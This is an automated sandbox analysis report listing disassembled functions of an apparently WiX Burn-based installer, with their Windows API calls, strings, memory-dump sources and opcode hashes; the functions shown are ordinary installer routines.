Instruction Fuzzy Hash: 2721E3B1B01304FFEB149BB69D15ABE77EAEB05700F40412FB846DA2A0E730DA409B14

Function 0069D5C0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(E42EB675,00000000,?,006946F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00695386,?,?), ref: 0069D5CD
GetLastError.KERNEL32(?,006946F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00695386,?,?), ref: 0069D5DA
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0069D612
GetLastError.KERNEL32(?,006946F8,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00695386,?,?), ref: 0069D61E

Strings

Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0069D649
Failed to load UX DLL., xrefs: 0069D605
BootstrapperApplicationCreate, xrefs: 0069D60C
Failed to create UX., xrefs: 0069D662
wininet.dll, xrefs: 0069D5F8, 0069D63C, 0069D667
userexperience.cpp, xrefs: 0069D5FB, 0069D63F

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
API String ID: 1866314245-1140179540
Opcode ID: eca2f2f27eff47b404c52bccd1fae4d6385e0c660c0cf8b2f97a049be9728fa9
Instruction ID: 618c37696513e6d4cfd8fc3d740c066d48648c665054c9883c3665c86d07ef07
Opcode Fuzzy Hash: eca2f2f27eff47b404c52bccd1fae4d6385e0c660c0cf8b2f97a049be9728fa9
Instruction Fuzzy Hash: 7711A332E41721ABEB215BA99C05B6B37DADF05750F02413BFD0AE7B90DA20CC0086E5

Function 00694690 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 006946B5
GetCurrentThreadId.KERNEL32 ref: 006946BB

Part of subcall function 006AFC51: new.LIBCMT ref: 006AFC58

GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00694749

Strings

Failed to create engine for UX., xrefs: 006946D5
engine.cpp, xrefs: 00694795
Failed to load UX., xrefs: 006946FE
Unexpected return value from message pump., xrefs: 0069479F
Failed to start bootstrapper application., xrefs: 00694717
wininet.dll, xrefs: 006946E8

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: ecf09f35aa8d165a7a8d9a35e922b7eb46f4856451811211ebe405f6a6a2eb12
Instruction ID: bc75c40b8ed3835279e7eec2613cdb149baac0db6e9e98314baf2cc7f3b328df
Opcode Fuzzy Hash: ecf09f35aa8d165a7a8d9a35e922b7eb46f4856451811211ebe405f6a6a2eb12
Instruction Fuzzy Hash: D741A371A00119BFEF159BE4CC85EBAB7AEEF05714F11012AF905EB640DF21ED0687A5

Function 6C8D66A7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,00000000,?,00000000,?,00000000,?,00000000), ref: 6C8D66C4
GetLastError.KERNEL32(?,00000000,?,00000000,?,00000000,?,00000000), ref: 6C8D66CF
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 6C8D66FE
GetFileVersionInfoW.VERSION(00000000,00000000,00000000,00000000), ref: 6C8D671F
GetLastError.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C8D6728
VerQueryValueW.VERSION(00000000,6C8F1ACC,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C8D6760
GetLastError.KERNEL32(00000000,6C8F1ACC,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C8D6769
GlobalFree.KERNEL32(00000000), ref: 6C8D679D

Strings

fileutil.cpp, xrefs: 6C8D66ED, 6C8D6746

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ErrorLast$FileGlobalInfoVersion$AllocFreeQuerySizeValue
String ID: fileutil.cpp
API String ID: 2342464106-2967768451
Opcode ID: 663f54374b951fbe51b0cf3777808d5c789f876e361885c4fc8829211ef38272
Instruction ID: 37ffc4b74661fd479d9672104f58cf41df1b3ef1a65f5ad92777782b82197808
Opcode Fuzzy Hash: 663f54374b951fbe51b0cf3777808d5c789f876e361885c4fc8829211ef38272
Instruction Fuzzy Hash: 57218475A0021DABD7329AA9DA449DBBBBCEF56354F024A66FD00E7640EB30DD0097E0

Function 0069F69D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0069F7CD
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0069F7DA

Strings

Failed to format pending restart registry key to read., xrefs: 0069F6D1
%ls.RebootRequired, xrefs: 0069F6BA
Failed to open registration key., xrefs: 0069F736
Resume, xrefs: 0069F741
Failed to read Resume value., xrefs: 0069F763

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 5388434d7c9ec2d231f7c2b41cabbbc60754a73fed14044ea8da0e0d386f4723
Instruction ID: 186e9fec7ecc9ecdb15d05683e121fdfc162cd11b66925a4386cc1b93cc335e0
Opcode Fuzzy Hash: 5388434d7c9ec2d231f7c2b41cabbbc60754a73fed14044ea8da0e0d386f4723
Instruction Fuzzy Hash: 00414F36D00219EBDF119FD5D881AEDBBAAFB05311F26456AE814EF710C3719E519B40

Function 6C8DBD67 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windowfileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6C8DBD80
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,08000000,00000000,00000000,00000033,6C8FA028,?,00000000,00000000,?,6C8FA028,00000033), ref: 6C8DBDB9
GetLastError.KERNEL32(?,00000000,00000000,?,6C8FA028,00000033), ref: 6C8DBDC6
SendMessageW.USER32(00000000,00000435,00000000,?), ref: 6C8DBE15
SendMessageW.USER32(?,00000449,00000002,?), ref: 6C8DBE37
CloseHandle.KERNELBASE(00000000,00000000,00000033,6C8FA028,?,00000000,00000000,?,6C8FA028,00000033), ref: 6C8DBE50

Strings

thmutil.cpp, xrefs: 6C8DBDEA

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: MessageSend$CloseCreateErrorFileHandleItemLast
String ID: thmutil.cpp
API String ID: 875121269-2961750086
Opcode ID: 7efb08cda8ae435c6bad7614c7a914329aa7da4f855a30383cfb6fdc993d1477
Instruction ID: af8ced0e8af7503ba80896b2bbd3a8b81e16790390474ab156f214da5803698c
Opcode Fuzzy Hash: 7efb08cda8ae435c6bad7614c7a914329aa7da4f855a30383cfb6fdc993d1477
Instruction Fuzzy Hash: AE21A272A00219BBDB219EA9CD45BDF7BB8AF04724F214625FA10B72D0C770AD10DBD0

Function 6C8D6ABE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6C8DC88A: SysAllocString.OLEAUT32(?), ref: 6C8DC89D
Part of subcall function 6C8DC88A: VariantInit.OLEAUT32(?), ref: 6C8DC8A9
Part of subcall function 6C8DC88A: VariantClear.OLEAUT32(?), ref: 6C8DC91D
Part of subcall function 6C8DC88A: SysFreeString.OLEAUT32(00000000), ref: 6C8DC928

SysFreeString.OLEAUT32(00000000), ref: 6C8D6B14
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,yes,000000FF,?,Overridable,00000000,00000000,?), ref: 6C8D6B43
SysFreeString.OLEAUT32(00000000), ref: 6C8D6B5D
SysFreeString.OLEAUT32(00000000), ref: 6C8D6B8E

Strings

Overridable, xrefs: 6C8D6B1E
#(loc.%s), xrefs: 6C8D6AF7
yes, xrefs: 6C8D6B35

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: String$Free$Variant$AllocClearCompareInit
String ID: #(loc.%s)$Overridable$yes
API String ID: 2861138797-597988432
Opcode ID: 77e60b677816812f9de55768d2a7c0d96c6f4165401d9d4ced58ab9b006ab5d4
Instruction ID: 7a94f832f69f100aff426a7faf5358587e3c1709e3c0a48af6c7d9d048cefc18
Opcode Fuzzy Hash: 77e60b677816812f9de55768d2a7c0d96c6f4165401d9d4ced58ab9b006ab5d4
Instruction Fuzzy Hash: D021913280121DFBCB21DA94CE40FDDB778FF04369F214A60E810A76A0D730AE05EB90

Function 006D041B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(006FB60C,00000000,?,?,?,00695407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 006D042B
CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,006FB604,?,00695407,00000000,Setup), ref: 006D04CC
GetLastError.KERNEL32(?,00695407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 006D04DC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00695407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 006D0515

Part of subcall function 00692DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00692F1F

LeaveCriticalSection.KERNEL32(006FB60C,?,?,006FB604,?,00695407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 006D056E

Strings

logutil.cpp, xrefs: 006D04FA

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 075ac9da022d085bb8c64508473f5d984689866cd0fa28a715b88a9d73ac0f6f
Instruction ID: bc3e6165806ee87f753c2335c7859211f762dd1ee5f9ee1e55a890cc17e95e83
Opcode Fuzzy Hash: 075ac9da022d085bb8c64508473f5d984689866cd0fa28a715b88a9d73ac0f6f
Instruction Fuzzy Hash: A6313271D01229BFEB219F61ED45FAA366BEB01794F01212AFE00E6350D770CD50DB94

Function 6C8DA478 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 110windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8DC88A: SysAllocString.OLEAUT32(?), ref: 6C8DC89D
Part of subcall function 6C8DC88A: VariantInit.OLEAUT32(?), ref: 6C8DC8A9
Part of subcall function 6C8DC88A: VariantClear.OLEAUT32(?), ref: 6C8DC91D
Part of subcall function 6C8DC88A: SysFreeString.OLEAUT32(00000000), ref: 6C8DC928

SysFreeString.OLEAUT32(00000000), ref: 6C8DA4CE
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,00000000,FF000000,00000000,ImageResource,00000000,00000000,00000000), ref: 6C8DA53D

Part of subcall function 6C8DD0EA: GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6C8DD122
Part of subcall function 6C8DD0EA: GetLastError.KERNEL32 ref: 6C8DD12E
Part of subcall function 6C8DD0EA: GlobalFree.KERNEL32(00000000), ref: 6C8DD240

SysFreeString.OLEAUT32(00000000), ref: 6C8DA58F

Strings

ImageFile, xrefs: 6C8DA4E2
ImageResource, xrefs: 6C8DA486
thmutil.cpp, xrefs: 6C8DA55F

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: FreeString$AllocGlobalVariant$BitmapClearCreateErrorFromGdipInitLast
String ID: ImageFile$ImageResource$thmutil.cpp
API String ID: 2882486289-1357958357
Opcode ID: d98f70d1b56cd565e2a4644acf83ebbe9b9ffedb90ac5c49eaaa1eb9e832e857
Instruction ID: 481314ca5ceaf229efe1ec62bcb12a765d58b92f539300b3b4be16f65a707867
Opcode Fuzzy Hash: d98f70d1b56cd565e2a4644acf83ebbe9b9ffedb90ac5c49eaaa1eb9e832e857
Instruction Fuzzy Hash: B0318F76C01518FBCF229F95CE009DEBB79EF85714F224965E81067A10D731EE14EB90

Function 006D076C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,006952B5,00000000,?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D078A
GetLastError.KERNEL32(?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D0794
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D07C6
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,006A74AB,00000000), ref: 006D081D

Strings

procutil.cpp, xrefs: 006D080B

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: Token$CloseErrorHandleInformationLastOpenProcess
String ID: procutil.cpp
API String ID: 3370771294-1178289305
Opcode ID: 51f6d9c426c1454357793ab69e486e8c1a0dfee497710271768de7a464c8aa5d
Instruction ID: 73d08e1b72de327b32384611eabec9634b49315d7f7047b2452b5ceb15567ea5
Opcode Fuzzy Hash: 51f6d9c426c1454357793ab69e486e8c1a0dfee497710271768de7a464c8aa5d
Instruction Fuzzy Hash: 70218471D41228EBEB109B959C44BDEBBE9EF54710F124167ED15EB250D3704E00EBE0

Function 6C8D1B91 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36comregistrywindowCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(6C8F2A54,00000000,00000017,6C8F10F4,?,00000000,6C8D5214,?), ref: 6C8D1BA9
RegisterWindowMessageW.USER32(TaskbarButtonCreated), ref: 6C8D1BC7
GetLastError.KERNEL32 ref: 6C8D1BD7

Strings

Failed to get TaskbarButtonCreated message. Continuing., xrefs: 6C8D1BE8
TaskbarButtonCreated, xrefs: 6C8D1BC2
Failed to create ITaskbarList3. Continuing., xrefs: 6C8D1BBA

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: CreateErrorInstanceLastMessageRegisterWindow
String ID: Failed to create ITaskbarList3. Continuing.$Failed to get TaskbarButtonCreated message. Continuing.$TaskbarButtonCreated
API String ID: 1594109290-758521254
Opcode ID: 97f205407fb132166e350d116df2602bd4d9825a9260fa0642509e2eb5245fb2
Instruction ID: fe5a6a415d9485a63aa3170d89926d23e12814238a45d1abaf266adfadee0bd1
Opcode Fuzzy Hash: 97f205407fb132166e350d116df2602bd4d9825a9260fa0642509e2eb5245fb2
Instruction Fuzzy Hash: 95F0E2712083027BEB7806386F11FEA21E89F04359F120C3EFC66E0A90FA20E8019720

Function 006D343B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006D344A
InterlockedIncrement.KERNEL32(006FB6D8), ref: 006D3467
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,006FB6C8,?,?,?,?,?,?), ref: 006D3482
CLSIDFromProgID.OLE32(MSXML.DOMDocument,006FB6C8,?,?,?,?,?,?), ref: 006D348E

Strings

Msxml2.DOMDocument, xrefs: 006D347D
MSXML.DOMDocument, xrefs: 006D3489

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: e9fdcca58eec4a38aa9018277cd7b94b62f82e44d37ce32e344bc4fbff35ed99
Instruction ID: a958644da318ef2db704a217c2e67398befc7f6658aa342b8233bd69b8486063
Opcode Fuzzy Hash: e9fdcca58eec4a38aa9018277cd7b94b62f82e44d37ce32e344bc4fbff35ed99
Instruction Fuzzy Hash: 97F03061F4523997D7224FA5ED0DB6B2EA7AB80F65B12342FF900D1398D3688941C6B2

Function 006AE705 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 006AE734
SetWindowLongW.USER32(?,000000EB,00000000), ref: 006AE743
SetWindowLongW.USER32(?,000000EB,?), ref: 006AE757
DefWindowProcW.USER32(?,?,?,?), ref: 006AE767
GetWindowLongW.USER32(?,000000EB), ref: 006AE781
PostQuitMessage.USER32(00000000), ref: 006AE7DE

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: ee006892aff4f64424276adcf895d3a660d0dced6fc70b19f9d592e3ceaafc6d
Instruction ID: e309f04f78122c890101d487efdb662c797a35b156380d83aa100423b2ab136f
Opcode Fuzzy Hash: ee006892aff4f64424276adcf895d3a660d0dced6fc70b19f9d592e3ceaafc6d
Instruction Fuzzy Hash: 5221A136504118FFDF11AFA8DC48EAA7BABEF46350F164519F906AA2A0C731DD10EF60

Function 006D10C5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 006D10ED
RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,006A6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 006D1126
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 006D121A

Strings

BundleUpgradeCode, xrefs: 006D10CC
regutil.cpp, xrefs: 006D1161

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 51d91096b8e1c5a7b5dada334de4e32c6219beebb4d875499deb23a9e5529a8a
Instruction ID: d78be012d91e146eb51159f6899d588526571d6181cb33710f90004435c0027c
Opcode Fuzzy Hash: 51d91096b8e1c5a7b5dada334de4e32c6219beebb4d875499deb23a9e5529a8a
Instruction Fuzzy Hash: 90419431E0021ABBDB259F95C881AAEB7BBEF45710F11416AE915DF310D671EE428B90

Function 006B07E4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 006B088A
GetLastError.KERNEL32(?,?,?), ref: 006B0894

Strings

Failed to move file pointer 0x%x bytes., xrefs: 006B08C5
cabextract.cpp, xrefs: 006B08B8
Invalid seek type., xrefs: 006B0820

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: a11a430de212090caeb079070f24543978f91693cfbc68ac8188cc5adfd6a20b
Instruction ID: 3e91a1c5c4753349d14962b947b4098bf389e9830bd7a910663c81c4701af1ab
Opcode Fuzzy Hash: a11a430de212090caeb079070f24543978f91693cfbc68ac8188cc5adfd6a20b
Instruction Fuzzy Hash: 0431C471A00219FFDB04CFA9CC849AAB7AAFB04710B01822AF91597750D730EA518BD0

Function 00694013 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(0069533D,006953B5,00000000,00000000,?,006A9EE4,00000000,00000000,0069533D,00000000,006952B5,00000000,?,=Si,0069D4AC,=Si), ref: 00694021
GetLastError.KERNEL32(?,006A9EE4,00000000,00000000,0069533D,00000000,006952B5,00000000,?,=Si,0069D4AC,=Si,00000000,00000000), ref: 0069402F
CreateDirectoryW.KERNEL32(0069533D,006953B5,00695381,?,006A9EE4,00000000,00000000,0069533D,00000000,006952B5,00000000,?,=Si,0069D4AC,=Si,00000000), ref: 00694097
GetLastError.KERNEL32(?,006A9EE4,00000000,00000000,0069533D,00000000,006952B5,00000000,?,=Si,0069D4AC,=Si,00000000,00000000), ref: 006940A1

Strings

dirutil.cpp, xrefs: 006940CF

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: 9cd63f7c784d4b0bb7a0ce3ba8cdb139e60d781fce80652a7e667fdd837a098b
Instruction ID: d500b8dd0bba6a570c34375a4d69419a1b34b864d70320b99f35b7c95dcfe3d4
